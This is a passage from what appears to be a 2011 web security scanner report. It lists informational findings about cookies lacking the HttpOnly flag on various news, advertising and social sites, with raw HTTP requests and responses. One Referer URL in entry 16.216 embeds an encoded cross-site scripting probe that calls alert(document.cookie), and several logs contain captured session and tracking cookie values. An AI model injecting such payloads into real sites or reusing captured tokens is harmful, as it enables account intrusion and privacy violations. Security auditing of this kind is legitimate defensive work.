Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uit=1; di=%7B%226%22%3A%226422714091563403120%22%7D..1315071225.1WV|1315071141.1EY|1315071141.60|1315071141.1FE|1315071141.10R|1314983342.1OD; dt=X; uid=4e5e3f1ae3fd7427; uvc=34|35; psc=2

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:13:09 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
P3P: CP="NON ADM OUR DEV IND COM STA"
Set-Cookie: uid=0000000000000000; expires=Wed, 01-Sep-2021 11:13:09 GMT; path=/; domain=.addthis.com
Set-Cookie: di=deleted; expires=Sat, 04-Sep-2010 11:13:08 GMT; path=/; domain=.addthis.com
Set-Cookie: psc=deleted; expires=Sat, 04-Sep-2010 11:13:08 GMT; path=/; domain=.addthis.com
Location: /api/nai/optout-verify
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


16.206. http://www.bangkokpost.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.bangkokpost.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=bangkok+thailand+news
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:24:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: paramsR24=deleted; expires=Sat, 04-Sep-2010 02:24:53 GMT; path=/
Content-Type: text/html; charset=utf-8
Content-Length: 94108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head></head>
<title>Bangkok
...[SNIP]...

16.207. http://www.bizographics.com/nai/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizographics.com
Path:   /nai/optout

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai/optout?nocache=0.1024612 HTTP/1.1
Host: www.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=6439dd87-a6df-42d4-8c18-e9c26d5d40b4; BizoData=Pp1FHRK43Zw3KxG53nCJRNQb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KQZ00UippMVQ8aj5XcunNcMDa7Re6IGD4lD0jX1iszwmcsAd6xyMUDLG6hh7sErqHyaoEyKUrunjtqgDfn74jNwcPJZXKAa9DdLgeLHSyEVCqewehdQ95muedOoesP2U0B4uSKJipWuwJodXwOG6Ckz6TNNGdaF6nEbrp2RisySjMfspBnTRT6kxVDxqPldy6c1wwH4DELwm2ipwNADM4BS8geHXTbwiiAhQOisLS4E2RisHxH5APyXdljTHnfyBp1sJ7Vvkc46t01cWfT12ipyKbm8481vVAn4t3h6RTVissytDGtO0HVbGfbrxfWf6nc4wINO1L7830xNl7tETxisz59RGoQec9s3m5pebWcHCAieie

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Content-Language: en-US
Date: Sun, 04 Sep 2011 11:13:56 GMT
Location: http://www.bizographics.com/nai/checkoptout
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizographicsID=""; Domain=.bizographics.com; Expires=Sun, 04-Sep-2011 11:13:57 GMT; Path=/
Set-Cookie: BizoID=""; Domain=.bizographics.com; Expires=Sun, 04-Sep-2011 11:13:57 GMT; Path=/
Set-Cookie: BizoData=""; Domain=.bizographics.com; Expires=Sun, 04-Sep-2011 11:13:57 GMT; Path=/
Set-Cookie: BizoCustomSegments=""; Domain=.bizographics.com; Expires=Sun, 04-Sep-2011 11:13:57 GMT; Path=/
Set-Cookie: BizographicsOptOut=OPT_OUT; Domain=.bizographics.com; Expires=Fri, 02-Sep-2016 11:13:56 GMT; Path=/
Content-Length: 0
Connection: keep-alive


16.208. http://www.burstnet.com/cgi-bin/opt_out.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /cgi-bin/opt_out.cgi

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi-bin/opt_out.cgi?nocache=0.5978476 HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Location: /cgi-bin/opt_out_verify.cgi
Content-Type: text/plain
Date: Sun, 04 Sep 2011 11:12:45 GMT
Connection: close
Set-Cookie: CMS=1; domain=.burstnet.com; path=/; expires=Mon, 06-Jun-2011 11:12:44 GMT
Set-Cookie: CMP=1; domain=.burstnet.com; path=/; expires=Mon, 06-Jun-2011 11:12:44 GMT
Set-Cookie: TData=1; domain=.burstnet.com; path=/; expires=Mon, 06-Jun-2011 11:12:44 GMT
Set-Cookie: TID=1; domain=.burstnet.com; path=/; expires=Mon, 06-Jun-2011 11:12:44 GMT
Set-Cookie: BOO=opt-out; domain=.burstnet.com; path=/; expires=Fri, 02-Sep-2016 11:12:44 GMT
Set-Cookie: 56Q8=0; expires=Wed, 22-Aug-2001 17:30:00 GMT; path=/; domain=.www.burstnet.com


16.209. http://www.emirates.com/us/english/index.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.emirates.com
Path:   /us/english/index.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /us/english/index.aspx HTTP/1.1
Host: www.emirates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 04:29:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: CallHome=CallOutSelectedleft=tcm:272-703423&CallOutListleft=tcm:272-682407,tcm:272-703423,tcm:272-661058&CallOutSelectedmiddle=tcm:272-612252&CallOutListmiddle=tcm:272-547528,tcm:272-612252&CallOutSelectedright=tcm:272-702548&CallOutListright=tcm:272-632534,tcm:272-702548&CallOutSelectedwide=tcm:272-638820&CallOutListwide=tcm:272-638820; expires=Mon, 03-Sep-2012 04:29:34 GMT; path=/
Set-Cookie: Home=promoList=631535,631537,639275,631536,652515&promoSelected=631537; expires=Mon, 03-Sep-2012 04:29:34 GMT; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 177298


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
   <head><meta
...[SNIP]...

16.210. http://www.facebook.com/pages/Friends-of-The-Nation/147232991936  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Friends-of-The-Nation/147232991936

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Friends-of-The-Nation/147232991936 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/NationNews
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2FFriends-of-The-Nation%2F147232991936; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.29.44
Connection: close
Date: Sun, 04 Sep 2011 04:29:35 GMT
Content-Length: 0


16.211. http://www.google.com/reader/view/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /reader/view/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /reader/view/ HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
X-Reader-Google-Version: 546-000
Set-Cookie: SID=DQAAAO4AAAAdw-kaWu-Fwov6yR3LF5btRLGDJizUC9Raw-GqwLpasp50X9kbEGhwdFFWxcYXI6vBoZEjrRXVWtyYlNaY91rEqAzamUbDKHampxxkPLqMizg3O5oUyc70ZHiy4dZUyuRHQCXe2W5mn8nTZG6xBVeakd7uOtTtTw-4Eq-poXmbgVf-0J8etvwWsuVWzeC-uRjBpg6L4g-5Dw-fRjaHoozF0M7YxWMNbpqla2dOd6JS_ObnJKhIR1Y2k1Q-6HT1rHp85PXH5dE8SArpn0A5Ov1JEw-6AL1W9up9w8rOdgP7XrJglYeTt2h6xTlDPnLG2mY;Domain=.google.com;Path=/;Expires=Wed, 01-Sep-2021 04:30:17 GMT
X-Reader-User: 17465033393070012425
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Sun, 04 Sep 2011 04:30:17 GMT
P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><!--
Content-type: Preventing XSRF in IE.

-->
<head><meta http-equiv="X-UA-Compatible" content="chrome=
...[SNIP]...

16.212. http://www.mediaplex.com/optout_pure.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediaplex.com
Path:   /optout_pure.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optout_pure.php?cookie_test=true HTTP/1.1
Host: www.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mojo3=10105:9432/13966:3335/3484:36959; mojo2=10105:9432/3484:8030; svid=OPT-OUT

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Last-Modified: Sun, 04 Sep 2011 11:34:23 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Location: http://www.networkadvertising.org/optout/opt_success.gif
Content-Length: 166
Content-Type: text/html; charset=utf-8
Expires: Sun, 04 Sep 2011 11:34:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 11:34:23 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: mojo1=deleted; expires=Sat, 04-Sep-2010 11:34:22 GMT; path=/; domain=.mediaplex.com
Set-Cookie: mojo2=deleted; expires=Sat, 04-Sep-2010 11:34:22 GMT; path=/; domain=.mediaplex.com
Set-Cookie: mojo3=deleted; expires=Sat, 04-Sep-2010 11:34:22 GMT; path=/; domain=.mediaplex.com

<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<title>Set Cookie to optout</title>

<head/>

<body>


<body/>

<html/>

16.213. http://www.mediaplex.com/optout_pure.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediaplex.com
Path:   /optout_pure.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optout_pure.php?nocache=0.3308143 HTTP/1.1
Host: www.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=993782327310; mojo3=10105:9432/13966:3335/3484:36959; mojo2=10105:9432/3484:8030

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Last-Modified: Sun, 04 Sep 2011 11:32:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Location: /optout_pure.php?cookie_test=true
Content-Length: 166
Content-Type: text/html; charset=utf-8
Expires: Sun, 04 Sep 2011 11:32:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 11:32:00 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: svid=OPT-OUT; expires=Wed, 01-Sep-2021 11:32:00 GMT; path=/; domain=.mediaplex.com

<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<title>Set Cookie to optout</title>

<head/>

<body>


<body/>

<html/>

16.214. http://www.nexac.com/nai_optout.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nexac.com
Path:   /nai_optout.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai_optout.php?nocache=0.8033839 HTTP/1.1
Host: www.nexac.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y

Response

HTTP/1.1 302 Found
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml",CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo IVAa IVDa HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
Set-Cookie: na_id=ignore; expires=Fri, 11-Feb-2028 11:14:02 GMT; path=/; domain=.nexac.com
X-Powered-By: Jigawatts
Location: http://www.nexac.com/nai_verify.php
Content-type: text/html
Content-Length: 0
Date: Sun, 04 Sep 2011 11:14:02 GMT
Server: lighttpd/1.4.18


16.215. http://www.wtp101.com/casale_sync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wtp101.com
Path:   /casale_sync

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /casale_sync?cm_dsp_id=2&cm_user_id=qPptfUPS1JUAAD6emfQAAAAa&cm_callback_url=http%3A%2F%2Fr.casalemedia.com%2Frum HTTP/1.1
Host: www.wtp101.com
Proxy-Connection: keep-alive
Referer: http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1324821476@Top?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 03:03:54 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://r.casalemedia.com/rum?cm_dsp_id=2&external_user_id=9ce25df1-8701-4684-948e-35b3d6998d9a
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Pragma: no-cache
Set-Cookie: tuuid=9ce25df1-8701-4684-948e-35b3d6998d9a; path=/; expires=Tue, 03 Sep 2013 03:03:54 GMT; domain=.wtp101.com
Content-Length: 0
Connection: keep-alive


16.216. http://www.wtp101.com/pull_sync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wtp101.com
Path:   /pull_sync

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pull_sync?pid=openx HTTP/1.1
Host: www.wtp101.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?zoneid=5730&cb=99863551&ct0=http://oasc12.247realmedia.com/RealMedia/ads/click_lx.ads/ndtv.com/ROS/L12/99863551/Top/Martini/Openx_05182011_ron__051811_260/openx_728_leader2.html/4d686437616b354a4f636f41446f5675?http://msite.martiniadnetwork.com/action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http%3A//www.ndtv.com/article/india6a976%22%3E%3Cimg+src%3Da+onerror%3Dalert%28document.cookie%29%3E1e77da311f0/48-hours-on-mumbai-airports-main-runway-still-shut-131142//pubclick//Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/99863551?
Cookie: tuuid=9ce25df1-8701-4684-948e-35b3d6998d9a

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 03:56:13 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://r.openx.net/set?pid=25afcb2d-854d-efb2-7940-1323bbd101a7&rtb=161ef36d-6400-4423-ba43-31cc5143ed22
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Pragma: no-cache
Set-Cookie: tuuid=161ef36d-6400-4423-ba43-31cc5143ed22; path=/; expires=Tue, 03 Sep 2013 03:56:13 GMT; domain=.wtp101.com
Content-Length: 0
Connection: keep-alive


16.217. http://www.youtube.com/results  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /results

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /results HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:45:37 GMT
Server: wiseguy/0.6.10
X-Content-Type-Options: nosniff
Set-Cookie: GEO=fb9357de7d7cb21a75c15aa9010c2cc8cwsAAAAzVVMyF3tqTmMCcQ==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >
<!-- machid: pc2pRNk9sazdfMmQ0ck9qTmYtN3o5cTJhOHMyNFlLQVd1SldxbGhieldOdXdJc2JWQ2xVMF9n -->
<head>

<script>
var yt = yt || {};yt.timing = yt.timin
...[SNIP]...

16.218. http://www.youtube.com/watch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /watch

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /watch HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:45:43 GMT
Server: wiseguy/0.6.10
X-Content-Type-Options: nosniff
Set-Cookie: GEO=246b11d3c187ad1cd74971bd40aa9013cwsAAAAzVVMyF3tqTmMCdw==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html id="watch-html">
<head>
<script>
var yt = yt || {};yt.timing = yt.timing || {};yt.timing.tick = function(label, opt_time) {var timer = yt.timing['timer'] || {};if(opt_t
...[SNIP]...

16.219. http://www.ztsystems.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ztsystems.com
Path:   /Default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Default.aspx HTTP/1.1
Host: www.ztsystems.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 44919
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 1.1.4322
Set-Cookie: WDFAnonymous=4aed02d0-d873-4ac5-a925-cdb74c74f595; expires=Sun, 04-Sep-2011 04:57:25 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 04:37:25 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<HTML>
   <HEAD id="Head">
       <TITLE>
           ZT Systems | Precision-Fit Data Center Server Solutions, Desktop and Laptop PCs
       </TITLE
...[SNIP]...

16.220. http://www9.effectivemeasure.net/v4/em_dimg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www9.effectivemeasure.net
Path:   /v4/em_dimg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v4/em_dimg?flag=2&v=8f239a6b9fac654b50350d7277324e62e18088e4f8-084548474e62e180&vt=f3e151deb3caa78de189b9e202024e62e18088e413-981323754e62e180&hl=&sv=-1&pv=&pn=&p=aHR0cDovL3d3dy5uYXRpb25tdWx0aW1lZGlhLmNvbS8%3D&r=aHR0cDovL3d3dy5nb29nbGUuY29tL3NlYXJjaD9zb3VyY2VpZD1jaHJvbWUmaWU9VVRGLTgmcT1iYW5na29rK3RoYWlsYW5kK25ld3M%3D&f=1&ns=_em&rnd=0.43564966856501997&u=cat2_id%3D541.552057%26&sf=1& HTTP/1.1
Host: www9.effectivemeasure.net
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vt=f3e151deb3caa78de189b9e202024e62e18088e413-981323754e62e180; v=8f239a6b9fac654b50350d7277324e62e18088e4f8-084548474e62e180135_458

Response

HTTP/1.1 200 OK
P3P: policyref="http://www.effectivemeasure.net/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND UNI NAV COM"
Pragma: no-cache
Cache-Control: no-cache
Cache-Control: no-cache, must-revalidate
Pragma-directive: no-cache
Cache-Directive: no-cache
Expires: 0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: vt=37bd2e98f8eef49d6359b9e202024e62e18088e413-981323754e62e184; expires=Wed, 29-Aug-2012 02:25:08 GMT; path=/; domain=.effectivemeasure.net
Set-Cookie: v=c45e6f4d21959b13f4050d7277324e62e18088e4f8-084548474e62e184135_458; expires=Sun, 04-Sep-2011 02:55:08 GMT; path=/; domain=.effectivemeasure.net
Content-type: image/gif
Content-Length: 49
Date: Sun, 04 Sep 2011 02:25:08 GMT
Server: C10

GIF89a...................!.......,...........T..;

16.221. http://www9.effectivemeasure.net/v4/em_js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www9.effectivemeasure.net
Path:   /v4/em_js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v4/em_js?flag=0&v=&vt=&hl=&sv=0&pv=&pn=&p=aHR0cDovL3d3dy5uYXRpb25tdWx0aW1lZGlhLmNvbS8%3D&r=aHR0cDovL3d3dy5nb29nbGUuY29tL3NlYXJjaD9zb3VyY2VpZD1jaHJvbWUmaWU9VVRGLTgmcT1iYW5na29rK3RoYWlsYW5kK25ld3M%3D&f=1&ns=_em&rnd=0.828509088139981&u=cat2_id%3D541.552057%26&sf=1& HTTP/1.1
Host: www9.effectivemeasure.net
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: policyref="http://www.effectivemeasure.net/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND UNI NAV COM"
Pragma: no-cache
Cache-Control: no-cache
Cache-Control: no-cache, must-revalidate
Pragma-directive: no-cache
Cache-Directive: no-cache
Expires: 0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: vt=cff6b95a3706f313acc9b9e202024e62e18088e413-981323754e62e181; expires=Wed, 29-Aug-2012 02:25:05 GMT; path=/; domain=.effectivemeasure.net
